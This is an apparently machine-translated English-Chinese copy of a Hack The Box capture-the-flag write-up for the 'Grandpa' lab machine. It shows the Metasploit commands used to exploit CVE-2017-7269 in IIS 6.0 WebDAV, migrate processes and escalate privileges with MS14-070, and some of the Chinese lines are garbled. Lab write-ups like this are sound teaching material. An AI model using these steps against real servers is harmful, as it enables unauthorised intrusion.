推箱子2-向右推!_保持冷静，砍箱子-爷爷

推箱子2-向右推!

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.

Hack The Box(HTB)是一个在线平台，可让您测试渗透测试技能。 它包含一些不断更新的挑战。 他们中的一些人正在模拟现实世界的场景，而另一些人则更倾向于CTF的挑战风格。

Note. Only write-ups of retired HTB machines are allowed.

注意 。 只允许注销HTB机器。

Grandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge

爷爷是Hack The Box上较为简单的机器之一，但是它涵盖了被广泛利用的CVE-2017-7269。 利用此漏洞很简单，当它成为公共知识时，便可以立即访问全球数千个IIS服务器。

We will use the following tools to pawn the box on a Kali Linux box

我们将使用以下工具将盒子当成Kali Linux盒子

• nmap
  纳帕
• Searchsploit
  Searchsploit
• davtest
  davtest
• Metasploit
  Metasploit
• Local exploit suggester
  本地漏洞利用建议

Let's get started.

让我们开始吧。

I add grandpa on the /etc/hosts file

我在/ etc / hosts文件中添加爷爷

nano /etc/hosts

with

与

10.10.10.14     grandpa.htb

第1步-侦察 (Step 1 - Reconnaissance)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

开发机器之前的第一步是进行一些扫描和侦察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as you could.

这是最重要的部分之一，因为它将决定您以后可以尝试利用的内容。 最好在该阶段花费更多的时间以获取尽可能多的信息。

端口扫描 (Ports scanning)

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我将使用Nmap(网络映射器)。 Nmap是一个免费的开源实用程序，用于网络发现和安全审核。 它使用原始IP数据包来确定网络上可用的主机，这些主机提供的服务，它们正在运行的操作系统，使用的数据包过滤器/防火墙的类型以及许多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用许多命令来扫描网络。 如果您想了解更多信息，可以在这里查看文档。

I use the following command to perform an intensive scan:

我使用以下命令执行密集扫描：

nmap -A -v grandpa.htb

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：启用操作系统检测，版本检测，脚本扫描和跟踪路由

-v: Increase verbosity level

-v：提高详细程度

grandpa.htb: hostname for the Grandpa box

grandpa.htb： “爷爷”框的主机名

If you find the results a little bit too overwhelming, you can do another command to get only the open ports.

如果发现结果有点不堪重负，则可以执行另一个命令以仅获取打开的端口。

nmap grandpa.htb

We can see that there is only 1 open port:

我们可以看到只有1个开放端口：

Port 80. most often used by Hypertext Transfer Protocol (HTTP)

端口 80 。 超文本传输​​协议(HTTP)最常使用的

We know that the server is an IIS 6.0 from the http-server-header. Internet Information Services (IIS, formerly Internet Information Server) is an extensible web server software created by Microsoft for use with the Windows NT family. More info here

我们从http-server-header知道服务器是IIS 6.0。 Internet信息服务 ( IIS ，以前称为Internet Information Server )是Microsoft创建的可扩展的Web服务器软件，用于Windows NT家族。 更多信息在这里

IIS 6.0 (code name "Duct Tape"), included with Windows Server 2003 and Windows XP Professional x64 Edition, added support for IPv6 and included a new worker process model that increased security as well as reliability HTTP.sys was introduced in IIS 6.0 as an HTTP-specific protocol listener for HTTP requests

Windows Server 2003和Windows XP Professional x64 Edition附带的IIS 6.0(代号为“胶带”)增加了对IPv6的支持，并包括一个新的工作进程模型，该模型提高了安全性和可靠性，IIS 6.0中引入了HTTP.sys。 HTTP请求的HTTP特定协议侦听器

We can also see from the http-title that the website is "under construction" and that there is a http-webdav-scan with all the allowed methods

我们还可以从http-title中看到该网站正在“建设中”，并且存在一个使用所有允许方法的http-webdav-scan

I use nmap script to try to get more information. The script sends an OPTIONS request which lists the dav type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal IP addresses by doing pattern matching in the response body

我使用nmap脚本尝试获取更多信息。 该脚本发送一个OPTIONS请求，其中列出了dav类型，服务器类型，日期和允许的方法。 然后，它发送PROPFIND请求，并尝试通过在响应主体中进行模式匹配来获取公开的目录和内部IP地址

nmap --script http-webdav-scan -p80 grandpa.htb

Here is more info on this script from the nmap website

这是nmap网站上有关此脚本的更多信息

WebDAV or Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operations. More info here

WebDAV或Web分布式创作和版本控制 ( WebDAV )是超文本传输​​协议的扩展，该协议允许客户端执行远程Web内容创作操作。 更多信息在这里

We can see on the server support section that Microsoft's IIS has a WebDAV module.

我们可以在服务器支持部分看到Microsoft的IIS具有WebDAV模块。

I use davtest to check if I can upload files

我使用davtest检查是否可以上传文件

I use the following command

我使用以下命令

davtest -url http://10.10.10.14

It doesn't look like. I use Searchsploit to check if there is any known vulnerability on IIS 6.0. Searchsploit is a command line search tool for Exploit Database

看起来不像。 我使用Searchsploit来检查IIS 6.0上是否存在任何已知漏洞。 Searchsploit是漏洞数据库的命令行搜索工具

I use the following command

我使用以下命令

searchsploit iis 6.0

I can have more details on the exploit with

我可以通过

searchsploit -x 41738.py

The attack is based on a Return-oriented programming chain. Return-oriented programming (ROP) is a security exploit technique that allows an attacker to execute code in the presence of security defense such as executable space protection and code signing

攻击基于面向返回的编程链。 面向返回的编程 ( ROP )是一种安全利用技术，攻击者可以在存在安全防御(例如可执行空间保护和代码签名)的情况下执行代码

You can also check the Exploit Database to find the exploit

您还可以检查漏洞利用数据库以找到漏洞利用

the National Vulnerability Database

国家漏洞数据库

the Common Vulnerabilities and Exposure database

常见漏洞和披露数据库

There is one Metasploit module available

有一个可用的Metasploit模块

第2步-访问网站 (Step 2 - Visiting the website)

We don't see much when visiting the website. From the developer console - we can see it's powered by the ASP.NET framework

访问该网站时看不到太多内容。 在开发者控制台中-我们可以看到它由ASP.NET框架提供支持

We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders

我们将使用Metasploit ，它是一种渗透测试框架，可使黑客攻击变得简单。 对于许多攻击者和防御者来说，这是必不可少的工具

I launch Metasploit Framework on Kali and look for command I should use to launch the exploit

我在Kali上启动Metasploit框架 ，并寻找启动漏洞利用程序所需的命令

If I use this command

如果我使用此命令

searchsploit iis 6.0

I get the same table that I had from the Terminal earlier

我得到的终端表与之前的终端机相同

If I type

如果我输入

search iis 6.0

I get 174 results

我得到174个结果

The exploit I'm interested in is number 147 on this list

我感兴趣的漏洞利用程序在此列表中排名第147

If you want to have some information on the exploit, you can use the following command

如果您想了解有关漏洞利用的一些信息，可以使用以下命令

info exploit/windows/iis/iis_webdav_scstoragepathfromurl

And you will get more details on the exploit

您将获得有关漏洞利用的更多详细信息

I use the following command to use the exploit

我使用以下命令来使用漏洞利用程序

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

I need to set up the options before launching the exploit. I check the options with

我需要在启动漏洞利用程序之前设置选项。 我检查选项

show options

I set the RHOSTS with the following command

我用以下命令设置RHOSTS

set RHOSTS 10.10.10.14

When I check again the options, I get this

当我再次检查选项时，我得到了

I check if the target is vulnerable with

我检查目标是否易受攻击

check

Then I run the exploit with the command

然后我用命令运行漏洞

exploit

And I get a Meterpreter session

我得到了Meterpreter会议

From the Offensive Security website, we get this definition for Meterpreter

从“ 进攻性安全”网站上，我们获得了Meterpreter的定义

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Meterpreter是一种高级的，动态可扩展的有效负载，它使用内存中的 DLL注入暂存器，并在运行时通过网络进行了扩展。 它通过暂存器套接字进行通信，并提供全面的客户端Ruby API。 它具有命令历史记录，制表符完成，通道等功能。

You can read more about Meterpreter here

您可以在此处阅读有关Meterpreter的更多信息

Let's start by gathering some information

让我们开始收集一些信息

getuid returns the real user ID of the calling process. The session I got doesn't seem to have enough privileges to run this command. The access is denied

getuid返回调用过程的真实用户ID。 我获得的会话似乎没有足够的特权来运行此命令。 访问被拒绝

When this happens, I list the running processes with

发生这种情况时，我列出了正在运行的进程

ps

and pick one running NT AUTHORITY\NETWORK SERVICE

并选择一个正在运行的NT AUTHORITY \ NETWORK SERVICE

I migrate to the process 3644 with

我将迁移到进程3644

migrate 3644

Now when I check getuid, I got

现在，当我检查getuid时，我得到了

Server username: NT AUTHORITY\NETWORK SERVICE

This was the session I got at first before migrating to another process

这是我在迁移到另一个过程之前第一次参加的会议

This is the session I got after migrating to another process

这是我迁移到另一个进程后获得的会话

I type the following command to get a standard shell on the target system

我键入以下命令以在目标系统上获取标准外壳

shell

I check who I am on the machine with the command

我使用以下命令检查我在机器上的身份

whoami

I get more information from the machine with

我从机器上获得了更多信息

systeminfo

I navigate to C:\

我导航到C：\

then Documents and Settings with

然后文档和与设置

cd "Documents and Settings"

I can see two users - Administrator and Harry. I try to navigate to Harry. The access is denied. Same for the Administrator folder - which is expected as I don't have root access yet

我可以看到两个用户-Administrator和Harry 。 我试图导航到哈利。 访问被拒绝。 与Administrator文件夹相同-这是预期的，因为我还没有root访问权限

I exit the shell with the command

我用命令退出外壳

exit

第3步-使用本地漏洞利用建议程序 (Step 3 - Using local exploit suggester)

I run the local exploit suggester. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter

我运行本地漏洞利用建议程序 。 根据用户打开外壳的体系结构和平台以及meterpreter中可用的漏洞，建议利用漏洞

run post/multi/recon/local_exploit_suggester

I will use the MS14-070 exploit. I look for some more information on Metasploit with

我将使用MS14-070漏洞利用。 我正在寻找有关Metasploit的更多信息

info exploit/windows/local/ms14_070_tcpip_ioctl

As well as on the Rapid7 website

以及Rapid7网站上

步骤4-使用MS14-070执行特权升级 (Step 4 - Using MS14-070 to perform privilege escalation)

I put this session in the background with the command

我使用以下命令将此会话置于后台

background

I run the following command to use the exploit I found

我运行以下命令以使用发现的漏洞

use exploit/windows/local/ms14_070_tcpip_ioctl

I then check for the options of this exploit

然后，我检查此漏洞利用的选项

I set the session with

我设置了会话

set SESSION 1

I run the exploit with

我与运行漏洞

run

The exploit succeeded but I didn't get a shell back. I check the options

该漏洞利用成功了，但是我没有得到一个外壳。 我检查选项

and set the LHOST to my IP with

并将LHOST设置为我的IP

set LHOST 10.10.14.36

You can check yours here

你可以在这里检查你的

I then run the exploit with

然后，我使用

exploit

This confirms that the exploit has succeeded but I still don't get a shell. I check the session with

这确认漏洞利用成功，但是我仍然没有外壳。 我检查会话

sessions -l

I should have

我应该

NT AUTHORITY\SYSTEM

Which is not the case now so I go back to this session with

现在不是这种情况，所以我回到

sessions -i 1

I check getuid and get NT AUTHORITY\SYSTEM back. I get a standard shell on the target system and check who am I on the machine. I get NT AUTHORITY\NETWORK SERVICE back, which is not what I want!

我检查getuid并获得NT AUTHORITY \ SYSTEM 。 我在目标系统上获得了标准外壳，并检查我在计算机上是谁。 我回来了NT AUTHORITY \ NETWORK SERVICE ，这不是我想要的！

I exit this shell and check the processes. I can see that I have admin access on the machine. I just meed to migrate to another process - which I do with

我退出此外壳并检查进程。 我可以看到我在计算机上具有管理员访问权限。 我只是想迁移到另一个过程-我这样做

migrate 408

Back to the standard shell on the target system and when I check who I am on the machine I'm finally an admin!

回到目标系统上的标准外壳，当我检查我在机器上的身份时，我终于是管理员！

步骤5-寻找user.txt标志 (Step 5 - Looking for the user.txt flag)

I navigate to the Harry folder from the Documents and Settings

我从文档和设置导航到Harry文件夹

I can list all the files/folders with the following command

我可以使用以下命令列出所有文件/文件夹

dir

I then move to the Desktop

然后，我转到桌面

And I find the user flag! I can check the content of the file with

而且我找到了用户标志！ 我可以用检查文件的内容

type user.txt

第6步-寻找root.txt标志 (Step 6 - Looking for the root.txt flag)

Let's find the root flag now! I navigate up to Users and check in to the Administrator/Desktop folder. I find the flag!

让我们现在找到根标志！ 我向上导航至“ 用户”并签入“ 管理员 / 桌面”文件夹。 我找到了旗帜！

I use the following command to see the content of the file

我使用以下命令查看文件内容

type root.txt

Congrats! You found both flags!

恭喜！ 您找到了两个标志！

Please don’t hesitate to comment, ask questions or share with your friends :)

请不要犹豫，发表评论，提问或与您的朋友分享:)

You can see more of my articles here

您可以在这里看到更多我的文章

You can follow me on Twitter or on LinkedIn

您可以在Twitter或LinkedIn上关注我

And don't forget to #GetSecure, #BeSecure & #StaySecure!

并且不要忘记＃ GetSecure ，＃ BeSecure和＃StaySecure ！

---

---

Other Hack The Box articles

其他Hack The Box文章

• Keep Calm and Hack The Box - Lame

  保持冷静并砍箱子-me脚

• Keep Calm and Hack The Box - Legacy

  保持冷静并打破常规-旧版

• Keep Calm and Hack The Box - Devel

  保持冷静并打破僵局-开发

• Keep Calm and Hack The Box - Beep

  保持冷静并砍箱子-哔

• Keep Calm and Hack The Box - Optimum

  保持冷静并打破僵局-最佳

• Keep Calm and Hack The Box - Arctic

  保持冷静，砍箱子-北极

翻译自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-grandpa/

推箱子2-向右推!